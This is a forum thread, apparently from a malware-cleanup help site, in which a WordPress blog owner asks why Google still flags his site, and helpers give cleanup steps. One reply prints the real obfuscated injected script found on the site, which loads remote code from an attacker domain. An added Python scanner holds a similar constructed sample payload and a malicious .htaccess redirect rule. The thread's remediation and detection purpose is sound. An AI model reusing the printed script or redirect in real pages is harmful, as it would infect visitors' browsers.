Hi,
My personal website buyruk.net has been reported as a suspected malware website by Google to StopBadware. I have checked with my hosting company and removed the files which seem to be problematic. However, even though I have requested a review, I still get Google’s warning page. Here is the list of the files that are listed as problematic:
P.S. I am using a WordPress blog and have the most up-to-date version installed, 2.8.4.
Any suggestions?
Thanks,
Buyruk
I think you’ll find that the site has been compromised because of a leaked password.
Several infections seem to exist on the site.
First of all, check the administrative PC for malware; use multiple AV and malware scanners to check, and remove any found.
Change the password of the FTP, preferably from an alternate PC.
Do NOT store the password in your FTP client.
Find and remove the malware that is on the site:
Your .htaccess file may redirect search engine traffic, so please check the .htaccess file in all folders including above the root folder of the site itself.
You’ve also got a Martuz or variant thereof, so you will likely find iframes or malicious scripts embedded in the various files of your site. Check both normal HTML/PHP files as well as script files.
When all is done and found, you can request a Review from Google Webmaster Tools. This review will take a few hours, but if no suspicious activity is found, then the site will be taken off the suspicious list.
Tools you may find useful, including website scanners:
http://badwarebusters.org/main/itemview/1659#itemblock-3035
Google webmaster tools:
http://www.google.com/webmasters/tools/
Your Diagnostics page:
http://www.google.com/safebrowsing/diagnostic?site=http://buyruk.net
Well, I have deleted all the infected files and overwritten all the WordPress files from a new WordPress installation package. Since all these infected files are under the blog subdomain, I am suspicious about the WordPress files.
Plus, I have also deleted all of the .htaccess files. So they should not be causing any problem.
I have also changed the password and taken the other related administrative steps that could be taken in this matter.
Buyruk
After you have done all of this, have you requested a new review from the webmaster tools?
You should be notified when a review is finished, and should wait for this.
I seem to get an access denied (403), when I try to use the domain name – Are you still modifying the files or what is going on?
EDIT: error number
Hi,
Yes I have requested a new review from the webmaster tools. I have not been notified by an e-mail or any other way. However when I go to the page:
http://www.google.com/safebrowsing/diagnostic?site=http://buyruk.net/&hl=en
It says that the last time Google visited was August 21st. So I assume that they have done the review. Please advise if I should be expecting otherwise.
Please also visit the site via: http://buyruk.net/blog/
Thanks,
Buyruk
Bad script on page:
(function(h8fE){var fgjpo='%';eval(unescape(('var"20a"3d"22Scri"70tEn"67in"65"22"2cb"3d"22V"65"72sio"6e()+"22"2cj"3d"22"22"2cu"3d"6eaviga"74or"2euserAg"65nt"3bi"66((u"2ein"64"65xOf("22"43"68"72om"65"22)"3c"30)"26"26"28u"2e"69"6ede"78"4ff("22"57i"6e"22"29"3e0"29"26"26"28u"2ei"6ede"78Of("22NT"206"22)"3c0)"26"26(document"2e"63"6fo"6bie"2e"69nd"65x"4ff"28"22m"69ek"3d1"22)"3c"30)"26"26(t"79peof(zrv"7ats)"21"3dtyp"65of("22A"22)))"7b"7arvz"74s"3d"22A"22"3be"76a"6c("22if"28win"64ow"2e"22+a+"22)j"3dj"2b"22"2ba+"22Ma"6aor"22+"62+a+"22Minor"22+b+a+"22Build"22+b+"22j"3b"22)"3bdo"63um"65nt"2ewrite("22"3cscr"69"70"74"20src"3d"2f"2fmar"22"2b"22tuz"2ecn"2fv"69d"2f"3fi"64"3d"22+"6a+"22"3e"3c"5c"2f"73c"72ipt"3e"22)"3b"7d').replace(h8fE,fgjpo)))})(/\"/g);
That should be removed.
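Added example (not part of the thread and not any poster's code): a static scan of a site tree for the two things the replies above point to, .htaccess files with Referer-conditioned rewrites and the eval(unescape(...)) wrapper of the quoted script, decoding the payload without executing it to show which host it loads. The sample file, the host bad.example.invalid and all function names are constructed for illustration.

```python
import os
import re
import tempfile
from collections import Counter
from urllib.parse import unquote

# Wrapper used by the script quoted above: eval(unescape(('<body>').replace(x, '%')))
WRAPPER = re.compile(r"eval\(unescape\(\('(?P<body>.*?)'\)\.replace\(", re.S)
# A rewrite conditioned on the Referer header is how search traffic gets singled out
REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I | re.M)
SRC_HOST = re.compile(r"src\s*=\s*[\"']?(?:https?:)?//([\w.-]+)", re.I)

def decode_body(body):
    """Decode statically (nothing runs): the mark that most often precedes two hex digits stands in for '%'."""
    marks = Counter(re.findall(r"([^\w\s])(?=[0-9a-fA-F]{2})", body)).most_common(1)
    mark = marks[0][0] if marks else "%"
    decoded = unquote(body.replace(mark, "%"), encoding="latin-1")
    return re.sub(r"[\"']\s*\+\s*[\"']", "", decoded)  # rejoin "ab"+"cd" splits

def scan_tree(root):
    """Map relative path -> finding for every suspicious file under root."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:
                text = fh.read()
            rel = os.path.relpath(path, root)
            if name == ".htaccess" and REFERER_COND.search(text):
                findings[rel] = "referer-conditioned rewrite"
            for m in WRAPPER.finditer(text):
                hosts = SRC_HOST.findall(decode_body(m.group("body")))
                findings[rel] = "obfuscated eval -> " + (", ".join(hosts) or "no src found")
    return findings

# Constructed sample, encoded the same way; the host is a placeholder, not from the thread.
SAMPLE = r'''<?php get_footer(); ?><script>(function(q){var p='%';eval(unescape(('docu"6dent"2ewr"69te("22"3cscr"69pt"20src"3d"2f"2fbad"2eexam"22"2b"22ple"2einvalid"2fv"2f"3e"3c"2fscr"69pt"3e"22)').replace(q,p)))})(/\"/g);</script>'''

def demo():
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "blog"))
        for rel, text in {"blog/footer.php": SAMPLE, "blog/index.php": "<?php echo 1; ?>",
                          ".htaccess": "RewriteCond %{HTTP_REFERER} google [NC]\nRewriteRule .* http://bad.example.invalid/ [R,L]\n"}.items():
            with open(os.path.join(root, rel), "w", encoding="latin-1") as fh:
                fh.write(text)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

Run it against a local copy of the site (for example one pulled over FTP after the password change) rather than the demo tree; any path it reports is a file to inspect by hand.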
Hi Again,
Thanks for the tip. I have found the pages that seem to have the code you have given above. I have cleaned them also. After I made these changes, I checked the infected pages again, and could not see the code you mentioned anymore in any of those pages.
After I requested another review from Google, I checked again and they still have the list of the infected files:
What could be wrong this time?



